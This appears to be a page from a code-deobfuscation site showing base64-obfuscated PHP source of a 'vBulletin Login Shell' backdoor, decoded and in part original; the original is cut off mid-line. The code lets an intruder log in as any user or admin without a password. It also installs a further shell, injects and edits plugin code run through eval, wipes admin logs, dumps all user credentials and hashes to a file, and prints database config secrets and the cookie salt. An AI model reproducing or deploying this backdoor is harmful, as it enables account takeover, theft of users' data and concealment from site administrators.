$u3c0be965 = base64_decode('aW9naW4ucGhw');
} else {
$u3c0be965 = base64_decode('bG5kZXgucGhw');
}
$wae9089d4 = @file_put_contents($u3c0be965, $wfd3b2e70);
if($wae9089d4)
{
?>
<h1>TeamPS Shell installed!</h1>
<p><a href="<?= $u3c0be965 ?>" target="_blank">Go to shell</a></p>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
else
{
?>
<h1>TeamPS Shell failed to install :(</h1>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('Y2xlYXJhZG1pbmxvZw=='))
{
?>
<h1>Clear adminlog</h1>
<h3>How do you want to clear it?</h3>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="doclearadminlog">
<p><input type="radio" name="method" value="0"> Truncate entire table (resets adminlogid to 0)</p>
<p><input type="radio" name="method" value="1"> Delete entire table (does not reset adminlogid)</p>
<p><input type="radio" name="method" value="2"> Drop entire table (removes the table from the database completely, will cause db errors for site admins)</p>
<p><input type="radio" name="method" value="3" checked> Just clear my logs (best option)</p>
<button type="button" onclick="window.location.href = '<?php echo SELF; ?>'">Cancel</button>
<input type="submit" name="clear" value="Clear adminlog">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA==') || $_REQUEST[base64_decode('ZG8=')] == base64_decode('ZGlzYWJsZXByb2R1Y3Q='))
{
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA=='))
{
$x4b1efc02 = base64_decode('MQ==');
$n102de0ab = base64_decode('ZW5hYmxlZA==');
}
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZGlzYWJsZXByb2R1Y3Q='))
{
$x4b1efc02 = base64_decode('MA==');
$n102de0ab = base64_decode('ZGlzYWJsZWQ=');
}
$oa3fdb2a7 = $_GET[base64_decode('cHJvZHVjdGlk')];
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIFVQREFURSA=') . TABLE_PREFIX . "product
SET active = '$x4b1efc02'
WHERE productid = '$oa3fdb2a7'
");
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zLnBocA=='));
vBulletinHook::xa0bf14dd($se3f4bc28);
j43427ac7();
require_once(DIR . base64_decode('L2luY2x1ZGVzL2NsYXNzX2JpdGZpZWxkX2J1aWxkZXIucGhw'));
vB_Bitfield_Builder::f55663ade($se3f4bc28);
vB_Cache::g4230b1de()->d230093f5(base64_decode('dmJfdHlwZXMudHlwZXM='));
require_once(DIR . base64_decode('L2luY2x1ZGVzL2Z1bmN0aW9uc19jcm9uLnBocA=='));
ncc7b7955();
require_once(DIR . base64_decode('L2luY2x1ZGVzL2NsYXNzX2Jsb2NrLnBocA=='));
$l4ab994b1 = vB_BlockManager::b8fd6e0fb($t2beff8da);
$l4ab994b1->fb6f81d07();
$l4ab994b1->r26a493c9(true, true);
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZW5hYmxlcHJvZHVjdA=='))
{
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zX3RlbXBsYXRlLnBocA=='));
mc06280cd(0, 0, base64_decode('cGx1Z2luLnBocD9kbz1wcm9kdWN0'), false, base64_decode('c3RhbmRhcmQ='));
mc06280cd(0, 0, base64_decode('cGx1Z2luLnBocD9kbz1wcm9kdWN0'), false, base64_decode('bW9iaWxl'));
}
?>
<h1>Product <?php echo $oa3fdb2a7 . base64_decode('IA==') . $n102de0ab; ?>!</h1>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('aG9va2VuYWJsZXI='))
{
?>
<h1>Enable/Disable Plugins</h1>
<form action="<?php echo SELF; ?>" method="post">
<input type="hidden" name="do" value="hookenabler">
<p><input type="radio" name="hooksenabled" value="1" checked> Enable Hooks</p>
<p><input type="radio" name="hooksenabled" value="0"> Disable Hooks</p>
<p><input type="checkbox" name="settings" checked> In settings</p>
<p><input type="checkbox" name="config"> In config.php</p>
<input type="submit" name="save" value="Save">
</form>
<?php }
elseif($_REQUEST[base64_decode('ZG8=')] == base64_decode('ZXhwb3J0dXNlcnM='))
{
$g1483a5e9 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIGNvdW50KHVzZXJpZCkgQVMgY291bnQgRlJPTSA=') . TABLE_PREFIX . base64_decode('dXNlcg=='));
?>
<style type="text/css">
progress[value] {
appearance: none;
-webkit-appearance: none;
}
</style>
<h1>User table export (<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?> users)</h1>
<progress style="width: 100%;" max="<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?>" value="0" id="userinfo_progress"></progress>
<p>Current progress: <span id="percentdumped">0</span>%</p>
<p><input type="text" id="atatime" value="10000"> Users to dump on each load</p>
<p><input type="text" id="timeout" value="3"> Time to wait in seconds between requests</p>
<p><a id="opendump" target="_blank" style="display: none;" href="loginshell_dump_<?php echo TIMENOW; ?>.txt">Open Dump File</a></p>
<p><button id="startdump" onclick="staggerUserDump()">Start Export</button></p>
<p><a href="<?php echo SELF; ?>">Go back</a></p>
<script type="text/javascript">
var currentLine = 0;
var linesToDump = 0;
var stopNow = false;
var timeout;
var ready;
var done = false;
var start;
var retrieved;
function openInNewTab(url)
{
var win = window.open(url, '_blank');
win.focus();
}
staggerUserDump = function()
{
document.getElementById('startdump').style.display = 'none';
linesToDump = parseInt(document.getElementById('atatime').value);
if(stopNow == true)
{
return true;
}
ajax = new XMLHttpRequest();
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
percent = (currentLine/<?php echo $g1483a5e9[base64_decode('Y291bnQ=')]; ?>)*100;
document.getElementById('userinfo_progress').value = document.getElementById('userinfo_progress').value+linesToDump;
if(percent > 100)
{
percent = 100;
done = true;
}
document.getElementById('percentdumped').innerHTML = Math.round(percent);
/**document.getElementById('userinfo').innerHTML = document.getElementById('userinfo').innerHTML + ajax.responseText;**/
retrieved = retrieved + ajax.responseText;
if(ajax.responseText == '')
{
document.getElementById('opendump').style.display = 'block';
stopNow = true;
return true;
}
else
{
currentLine = currentLine+linesToDump;
ajax.abort();
staggerUserDump();
}
}
}
ajax.open('POST', '<?php echo SELF; ?>');
ajax.setRequestHeader('Content-type','application/x-www-form-urlencoded');
ajax.send('do=staggereduserexport&startat=' + currentLine + '&linestoget=' + linesToDump + '&time=<?php echo TIMENOW; ?>');
}
</script>
<?php }
else
{
$d50a98831 = array();
$dbcea0e13 = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHVzZXJncm91cGlkIEZST00g') . TABLE_PREFIX . base64_decode('dXNlcmdyb3VwIFdIRVJFIGFkbWlucGVybWlzc2lvbnMgPSAnMyc='));
while($ua3937d25 = $t2beff8da->$j71beeff9->h35acb628($dbcea0e13))
{
$d50a98831[] = $ua3937d25[base64_decode('dXNlcmdyb3VwaWQ=')];
}
$ba2e0150f = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHVzZXJpZCxhZG1pbnBlcm1pc3Npb25zIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5pc3RyYXRvcg=='));
while($k8d93d649 = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$p6df44926 = p3f0fc2cb($k8d93d649[base64_decode('dXNlcmlk')]);
$x86a8d265 = array();
$x86a8d265[base64_decode('dXNlcmlk')] = $p6df44926[base64_decode('dXNlcmlk')];
$x86a8d265[base64_decode('dXNlcm5hbWU=')] = $p6df44926[base64_decode('dXNlcm5hbWU=')];
$x86a8d265[base64_decode('bXVzZXJuYW1l')] = m8b0ce0d($p6df44926);
$x86a8d265[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')] = $k8d93d649[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')];
$ba2e0150f[] = $x86a8d265;
}
$cb3ba5a5a = array();
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUIHByb2R1Y3RpZCx0aXRsZSx2ZXJzaW9uLGFjdGl2ZSx1cmwgRlJPTSA=') . TABLE_PREFIX . base64_decode('cHJvZHVjdA=='));
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) > 0)
{
while($nd34a04ad = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
$t66cd7cb2 = array();
$t66cd7cb2[base64_decode('cHJvZHVjdGlk')] = $nd34a04ad[base64_decode('cHJvZHVjdGlk')];
$t66cd7cb2[base64_decode('dGl0bGU=')] = $nd34a04ad[base64_decode('dGl0bGU=')];
$t66cd7cb2[base64_decode('dmVyc2lvbg==')] = $nd34a04ad[base64_decode('dmVyc2lvbg==')];
$t66cd7cb2[base64_decode('YWN0aXZl')] = $nd34a04ad[base64_decode('YWN0aXZl')];
$t66cd7cb2[base64_decode('dXJs')] = $nd34a04ad[base64_decode('dXJs')];
$cb3ba5a5a[] = $t66cd7cb2;
}
}
?>
<head><title>vB LoginShell 2.0</title></head>
<h1>vBulletin Login Shell | CP Login (<?php echo $t2beff8da->$o8165b856[base64_decode('YmJ0aXRsZQ==')]; ?>) (vB<?php echo substr($t2beff8da->$u75c40479,0 ,1); ?>)</h1>
<hr />
<form action="<?php echo SELF; ?>" method="get">
<input type="hidden" name="do" value="login" />
<input type="text" name="username" value="" />
<input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>Admins found: <?php echo count($ba2e0150f); ?></p>
<p><?php foreach($ba2e0150f as $u880e0d76){ echo base64_decode('PGEgaHJlZj0i') . SELF . base64_decode('P2RvPWxvZ2luJnVzZXJuYW1lPQ==') . $u880e0d76[base64_decode('dXNlcm5hbWU=')] . base64_decode('Ij4=') . $u880e0d76[base64_decode('bXVzZXJuYW1l')] . base64_decode('PC9hPg==') . (($u880e0d76[base64_decode('YWRtaW5wZXJtaXNzaW9ucw==')] == $la5e0f468) ? base64_decode('IChmdWxsIHBlcm1pc3Npb25zKQ==') : '') . base64_decode('IA==');} ?></p>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $t4267d023; ?>" target="_blank"><?php echo $jb8c13d30; ?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($o32d30f96 as $gbaab7a10) { echo base64_decode('PGEgaHJlZj0i') . $t2beff8da->$o8165b856[base64_decode('YmJ1cmw=')] . base64_decode('Lw==') . $gbaab7a10 . base64_decode('L2luZGV4LnBocCIgdGFyZ2V0PSJfYmxhbmsiPg==') . $gbaab7a10 . base64_decode('PC9hPiA='); }?></p>
<hr />
<p><a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a></p>
<p><a href="<?php echo SELF; ?>?do=installteampsshell">Install TeamPS Shell</a></p>
<p><a href="<?php echo SELF; ?>?do=clearadminlog">Clear adminlog</a></p>
<p><a href="<?php echo SELF; ?>?do=exportusers">Export users</a></p>
<hr />
<h3>Config Info</h3>
<pre>
<?php echo print_r($t2beff8da->$b2d0a0436); ?>
</pre>
<hr />
<p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></p>
<p>Cookie salt: <?php echo COOKIE_SALT; ?></p>
<hr />
<h3>Installed Products</h3>
<ul>
<li id="vbulletin"><span style="color: green;"><a style="color: green;" href="#" onclick="getPluginsForProduct('vbulletin');">vBulletin (<?php echo $t2beff8da->$u75c40479; ?>)</a></span></li>
<?php foreach($cb3ba5a5a as $nd34a04ad)
{
if($nd34a04ad[base64_decode('YWN0aXZl')])
{
$s665648e9 = base64_decode('Z3JlZW4=');
}
else
{
$s665648e9 = base64_decode('cmVk');
}
echo base64_decode('PGxpIGlkPSI=') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij48c3BhbiBzdHlsZT0iY29sb3I6IA==') . $s665648e9 . base64_decode('OyI+PGEgc3R5bGU9ImNvbG9yOiA=') . $s665648e9 . base64_decode('IiBocmVmPSIjIiBvbmNsaWNrPSJnZXRQbHVnaW5zRm9yUHJvZHVjdChcJw==') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('XCcpOyI+') . $nd34a04ad[base64_decode('dGl0bGU=')] . base64_decode('PC9hPg==') . base64_decode('ICg=') . $nd34a04ad[base64_decode('dmVyc2lvbg==')] . base64_decode('KQ==') . ((trim($nd34a04ad[base64_decode('dXJs')]) != null) ? base64_decode('ICg8YSBocmVmPSI=') . trim($nd34a04ad[base64_decode('dXJs')]) . base64_decode('IiB0YXJnZXQ9Il9ibGFuayI+VVJMPC9hPik=') : '') . base64_decode('ICg8YSBocmVmPSI=') . SELF . base64_decode('P2RvPWVuYWJsZXByb2R1Y3QmcHJvZHVjdGlkPQ==') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij5lbmFibGU8L2E+LzxhIGhyZWY9Ig==') . SELF . base64_decode('P2RvPWRpc2FibGVwcm9kdWN0JnByb2R1Y3RpZD0=') . $nd34a04ad[base64_decode('cHJvZHVjdGlk')] . base64_decode('Ij5kaXNhYmxlPC9hPik8L3NwYW4+PC9saT4=');
}
?>
</ul>
<p><a href="<?php echo SELF; ?>?do=hookenabler">Globally enable/disable hooks</a></p>
<hr />
<h6>Loginshell v3 beta</h6>
<script type="text/javascript">
function getPluginsForProduct(productid)
{
ajax = new XMLHttpRequest();
ajax.onreadystatechange = function()
{
if(ajax.readyState == 4 && ajax.status == 200)
{
ul = document.createElement('ul');
ul.setAttribute('id', 'pluginlist_' + productid);
document.getElementById(productid).appendChild(ul);
document.getElementById('pluginlist_' + productid).innerHTML = ajax.responseText;
}
}
ajax.open('POST', '<?php echo SELF; ?>');
ajax.setRequestHeader('Content-type','application/x-www-form-urlencoded');
ajax.send('do=fetchplugins&productid=' + productid);
}
</script>
<?php }
?>
Did this file decode correctly?
Original Code
<?php
/**
* vBulletin 3.8.x-4.x Login Shell
* Author: JB ([email protected])
* www.p0wersurge.com
* 13/01/2014 (updated 27/07/2015)
* Version 2.0
*/
@ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='), false);
$a7b4b3963 = explode(base64_decode('Lw=='), $_SERVER[base64_decode('UEhQX1NFTEY=')]);
$b7f8f6db3 = count($a7b4b3963);
define(base64_decode('U0VMRg=='), $a7b4b3963[$b7f8f6db3-1]);
if($_REQUEST[base64_decode('ZG8=')] == base64_decode('c3RhZ2dlcmVkdXNlcmV4cG9ydA=='))
{
if(isset($_REQUEST[base64_decode('c3RhcnRhdA==')]) && isset($_REQUEST[base64_decode('bGluZXN0b2dldA==')]) && isset($_REQUEST[base64_decode('dGltZQ==')]))
{
require_once(base64_decode('aW5jbHVkZXMvY29uZmlnLnBocA=='));
d5ef12828($cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('Og==') . $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cG9ydA==')], $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcm5hbWU=')], $cd48a2f7c[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cGFzc3dvcmQ=')]) or die(y797e7d40());
a3dd2685d($cd48a2f7c[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJuYW1l')]) or die(y797e7d40());
$qcd4d43ba = intval($_REQUEST[base64_decode('c3RhcnRhdA==')]);
$t24a543eb = intval($_REQUEST[base64_decode('bGluZXN0b2dldA==')]);
$m6f949845 = intval($_REQUEST[base64_decode('dGltZQ==')]);
$f24bdb5eb = p1e74da(base64_decode('U0VMRUNUIENPTkNBVF9XUygnOicsIGB1c2VybmFtZWAsIGBlbWFpbGAsIGBpcGFkZHJlc3NgLCBgcGFzc3dvcmRgLCBgc2FsdGApIEFTIHVzZXJpbmZvIEZST00g') . $cd48a2f7c[base64_decode('RGF0YWJhc2U=')][base64_decode('dGFibGVwcmVmaXg=')] . "user LIMIT $qcd4d43ba,$t24a543eb") or die(y797e7d40());
while($l8430f6db = l4e65fb9c($f24bdb5eb))
{
$wae9089d4 = @file_put_contents(base64_decode('bG9naW5zaGVsbF9kdW1wXw==') . $m6f949845 . base64_decode('LnR4dA=='), $l8430f6db[base64_decode('dXNlcmluZm8=')] . PHP_EOL, FILE_APPEND);
if(!$wae9089d4)
{
echo base64_decode('ZmFpbGVkIHRvIHdyaXRlIDoo');
}
else
{
echo base64_decode('d3JvdGUgbGluZXMg') . $qcd4d43ba . base64_decode('IHRvIA==') . $t24a543eb . base64_decode('IGludG8gZHVtcGZpbGU=');
}
}
}
exit;
}
require_once(base64_decode('Li9nbG9iYWwucGhw'));
error_reporting(0);
if(substr($t2beff8da->$u75c40479, 0, 1) > 3)
{
$la5e0f468 = base64_decode('MTY3NDQ0NDQ=');
function mcbc5c3db($vf85e0677)
{
global $t2beff8da;
$vf85e0677 = da3b75ac9($vf85e0677, base64_decode('IA=='));
if ($t2beff8da->$q710ad6c5 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHVzZXJpZCwgdXNlcmdyb3VwaWQsIG1lbWJlcmdyb3VwaWRzLCBpbmZyYWN0aW9uZ3JvdXBpZHMsIHVzZXJuYW1lLCBwYXNzd29yZCwgc2FsdCBGUk9NIA==') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2(ic703056f($vf85e0677)) . base64_decode('Jw==')))
{
c7d8cae74($g8049c82);
$bc4c0f458 = true;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X3N1Y2Nlc3M='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
$bc4c0f458 = false;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X2ZhaWx1cmVfdXNlcm5hbWU='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
}
else
{
$la5e0f468 = base64_decode('NDkxNTE2');
function mcbc5c3db($vf85e0677)
{
global $t2beff8da;
$vf85e0677 = da3b75ac9($vf85e0677, base64_decode('IA=='));
if ($t2beff8da->$q710ad6c5 = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUIHVzZXJpZCwgdXNlcmdyb3VwaWQsIG1lbWJlcmdyb3VwaWRzLCBpbmZyYWN0aW9uZ3JvdXBpZHMsIHVzZXJuYW1lLCBwYXNzd29yZCwgc2FsdCBGUk9NIA==') . TABLE_PREFIX . base64_decode('dXNlciBXSEVSRSB1c2VybmFtZSA9ICc=') . $t2beff8da->$j71beeff9->h2a2604e2(ic703056f($vf85e0677)) . base64_decode('Jw==')))
{
if ($t2beff8da->$u14b75f81[COOKIE_PREFIX . base64_decode('dXNlcmlk')] AND $t2beff8da->$u14b75f81[COOKIE_PREFIX . base64_decode('dXNlcmlk')] != $t2beff8da->$q710ad6c5[base64_decode('dXNlcmlk')])
{
yda224323(base64_decode('dXNlcmlk'), '', true, true, true);
yda224323(base64_decode('cGFzc3dvcmQ='), '', true, true, true);
}
yda224323(base64_decode('dXNlcmlk'), $t2beff8da->$q710ad6c5[base64_decode('dXNlcmlk')], true, true, true);
yda224323(base64_decode('cGFzc3dvcmQ='), md5($t2beff8da->$q710ad6c5[base64_decode('cGFzc3dvcmQ=')] . COOKIE_SALT), true, true, true);
$bc4c0f458 = true;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X3N1Y2Nlc3M='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
$bc4c0f458 = false;
($va4584355 = vBulletinHook::g603b58dc(base64_decode('bG9naW5fdmVyaWZ5X2ZhaWx1cmVfdXNlcm5hbWU='))) ? eval($va4584355) : false;
return $bc4c0f458;
}
}
$o32d30f96 = array();
$n7ac61e02 = array(
base64_decode('YXJjaGl2ZQ=='),
base64_decode('Y2xpZW50c2NyaXB0'),
base64_decode('Y3BzdHlsZXM='),
base64_decode('Y3VzdG9tYXZhdGFycw=='),
base64_decode('Y3VzdG9tZ3JvdXBpY29ucw=='),
base64_decode('Y3VzdG9tcHJvZmlsZXBpY3M='),
base64_decode('YXR0YWNo'),
base64_decode('Zm9ydW1ydW5uZXI='),
base64_decode('aW1hZ2Vz'),
base64_decode('aW5jbHVkZXM='),
base64_decode('aW5zdGFsbA=='),
base64_decode('cGFja2FnZXM='),
base64_decode('c2lnbmF0dXJlcGljcw=='),
base64_decode('c3RvcmVfc2l0ZW1hcA=='),
base64_decode('dmI=')
);
$jb8c13d30 = $t2beff8da->$b2d0a0436[base64_decode('TWlzYw==')][base64_decode('YWRtaW5jcGRpcg==')];
$t4267d023 = $t2beff8da->$o8165b856[base64_decode('YmJ1cmw=')] . base64_decode('Lw==') . $jb8c13d30 . base64_decode('L2luZGV4LnBocA==');
$d9fa3e414 = scandir(base64_decode('Lg=='));
foreach ($d9fa3e414 as $g136ac113) {
if ($g136ac113 == base64_decode('Lg==') or $g136ac113 == base64_decode('Li4=')) continue;
if (is_dir(base64_decode('Li8=') . $g136ac113)) {
if(in_array($g136ac113, $n7ac61e02)) continue;
if(@file_exists($g136ac113 . base64_decode('L2FkbWlubG9nLnBocA==')))
{
$o32d30f96[] = $g136ac113;
} else {
continue;
}
}
}
if(isset($_POST[base64_decode('ZG8=')]) && $_POST[base64_decode('ZG8=')] == base64_decode('ZmV0Y2hwbHVnaW5z'))
{
$oa3fdb2a7 = $_POST[base64_decode('cHJvZHVjdGlk')];
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "plugin WHERE product = '$oa3fdb2a7'");
if($t2beff8da->$j71beeff9->f3bf5fd4f($f24bdb5eb) < 1)
{
echo base64_decode('PGxpPjxzcGFuIHN0eWxlPSJjb2xvcjogcmVkOyI+Tm8gcGx1Z2lucyBmb3VuZC48L3NwYW4+PC9saT4=');
}
else
{
while($he96e2794 = $t2beff8da->$j71beeff9->h35acb628($f24bdb5eb))
{
if($oa3fdb2a7 == base64_decode('dmJ1bGxldGlu'))
{
$nd34a04ad = array(
base64_decode('YWN0aXZl') => (($t2beff8da->$o8165b856[base64_decode('YmJhY3RpdmU=')]) ? true : false)
);
}
else
{
$nd34a04ad = $t2beff8da->$j71beeff9->f6cb11695(base64_decode('U0VMRUNUICogRlJPTSA=') . TABLE_PREFIX . "product WHERE productid = '$oa3fdb2a7'");
}
if((!$nd34a04ad[base64_decode('YWN0aXZl')]) or ($nd34a04ad[base64_decode('YWN0aXZl')] && !$he96e2794[base64_decode('YWN0aXZl')]))
{
$s665648e9 = base64_decode('cmVk');
}
else
{
$s665648e9 = base64_decode('Z3JlZW4=');
}
echo base64_decode('PGxpPg==');
echo base64_decode('PGEgaHJlZj0i') . SELF . base64_decode('P2RvPWVkaXRob29rJmhvb2tpZD0=') . $he96e2794[base64_decode('cGx1Z2luaWQ=')] . base64_decode('IiBzdHlsZT0iY29sb3I6IA==') . $s665648e9 . base64_decode('Ij4=') . $he96e2794[base64_decode('dGl0bGU=')] . base64_decode('PC9hPiAob24gaG9vayA=') . $he96e2794[base64_decode('aG9va25hbWU=')] . base64_decode('KQ==');
echo base64_decode('PC9saT4=');
}
}
exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('ZG9lZGl0aG9vaw=='))
{
$nd34a04ad = $_POST[base64_decode('cHJvZHVjdA==')];
$va4584355 = $_POST[base64_decode('aG9va2xvY2F0aW9u')];
$o2b36786b = $_POST[base64_decode('dGl0bGU=')];
$e77153098 = $_POST[base64_decode('cGhwY29kZQ==')];
$rebad2053 = intval($_POST[base64_decode('ZXhlY29yZGVy')]);
$x4b1efc02 = intval($_POST[base64_decode('YWN0aXZl')]);
$vf1e744b = $_POST[base64_decode('aG9va2lk')];
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgIFVQREFURSA=') . TABLE_PREFIX . "plugin
SET
hookname = '$va4584355',
title = '" . $t2beff8da->$j71beeff9->h2a2604e2($o2b36786b) . base64_decode('JywNCiAgICAgICAgICAgIHBocGNvZGUgPSAn') . $t2beff8da->$j71beeff9->h2a2604e2($e77153098) . "',
product = '$nd34a04ad',
active = $x4b1efc02,
executionorder = $rebad2053
WHERE pluginid = '$vf1e744b'
");
vBulletinHook::xa0bf14dd($se3f4bc28);
?>
<h1>Plugin saved!</h1>
<pre>
<?php echo print_r($_POST); ?>
</pre>
<a href="<?php echo SELF; ?>">Go back</a>
<?php exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('ZG9jbGVhcmFkbWlubG9n'))
{
switch($_POST[base64_decode('bWV0aG9k')])
{
case base64_decode('MA=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('VFJVTkNBVEUgVEFCTEUg') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('MQ=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('REVMRVRFIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('Mg=='):
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('RFJPUCBUQUJMRSA=') . TABLE_PREFIX . base64_decode('YWRtaW5sb2c='));
break;
case base64_decode('Mw=='):
default:
$f24bdb5eb = $t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('REVMRVRFIEZST00g') . TABLE_PREFIX . base64_decode('YWRtaW5sb2cgV0hFUkUgaXBhZGRyZXNzID0gJw==') . $t2beff8da->$j71beeff9->h2a2604e2($_SERVER[base64_decode('UkVNT1RFX0FERFI=')]) . base64_decode('Jw=='));
break;
}
?>
<h1>Adminlog cleared!</h1>
<a href="<?php echo SELF; ?>">Go back</a>
<?php exit;
}
elseif($_POST[base64_decode('ZG8=')] == base64_decode('aG9va2VuYWJsZXI='))
{
$e50f9bb84 = $_POST[base64_decode('aG9va3NlbmFibGVk')];
$me545a0c5 = $_POST[base64_decode('c2V0dGluZ3M=')];
$cd48a2f7c = $_POST[base64_decode('Y29uZmln')];
$n102de0ab = base64_decode('ZGlzYWJsZWQ=');
if($e50f9bb84)
{
$n102de0ab = base64_decode('ZW5hYmxlZA==');
}
if(!$me545a0c5 && !$cd48a2f7c)
{
?>
<h1>Failed to update system</h1>
<p>No save method was defined.</p>
<?php }
else
{
echo base64_decode('PGgxPlBsdWdpbiBFbmFibGVyL0Rpc2FibGVyPC9oMT4=');
if($me545a0c5)
{
$t2beff8da->$j71beeff9->t24bdb5eb(base64_decode('DQogICAgICAgICAgICAgICAgVVBEQVRFIA==') . TABLE_PREFIX . "setting SET value = '$e50f9bb84' WHERE varname = 'enablehooks'
");
require_once(DIR . base64_decode('L2luY2x1ZGVzL2FkbWluZnVuY3Rpb25zLnBocA=='));
mfda0870b();
?>
<p>Hooks <?php echo $n102de0ab; ?> in settings</p>
<?php }
if($cd48a2f7c)
{
$xd343f512 = $t2beff8da->$b2d0a0436;
$gdeb54ee5 = base64_decode('PD9waHANCkBpbmlfc2V0KFwnZGlzcGxheV9lcnJvcnNcJywgZmFsc2UpOw0K') . (($e50f9bb84) ? '' : base64_decode('ZGVmaW5lKFwnRElTQUJMRV9IT09LU1wnLCB0cnVlKTs=')) . base64_decode('DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdkYnR5cGVcJ10gPSBcJw==') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJ0eXBl')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdkYm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('ZGJuYW1l')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCd0YWJsZXByZWZpeFwnXSA9IFwn') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('dGFibGVwcmVmaXg=')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCd0ZWNobmljYWxlbWFpbFwnXSA9IFwn') . $xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('dGVjaG5pY2FsZW1haWw=')] . base64_decode('XCc7DQokY29uZmlnW1wnRGF0YWJhc2VcJ11bXCdmb3JjZV9zcWxfbW9kZVwnXSA9IA==') . (($xd343f512[base64_decode('RGF0YWJhc2U=')][base64_decode('Zm9yY2Vfc3FsX21vZGU=')] == null) ? base64_decode('MA==') : base64_decode('MQ==')) . base64_decode('Ow0KJGNvbmZpZ1tcJ01hc3RlclNlcnZlclwnXVtcJ3NlcnZlcm5hbWVcJ10gPSBcJw==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('c2VydmVybmFtZQ==')] . base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wncG9ydFwnXSA9IA==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cG9ydA==')] . base64_decode('Ow0KJGNvbmZpZ1tcJ01hc3RlclNlcnZlclwnXVtcJ3VzZXJuYW1lXCddID0gXCc=') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('dXNlcm5hbWU=')] . base64_decode('XCc7DQokY29uZmlnW1wnTWFzdGVyU2VydmVyXCddW1wncGFzc3dvcmRcJ10gPSBcJw==') . $xd343f512[base64_decode('TWFzdGVyU2VydmVy')][base64_decode('cGFzc3dvcmQ=')] . 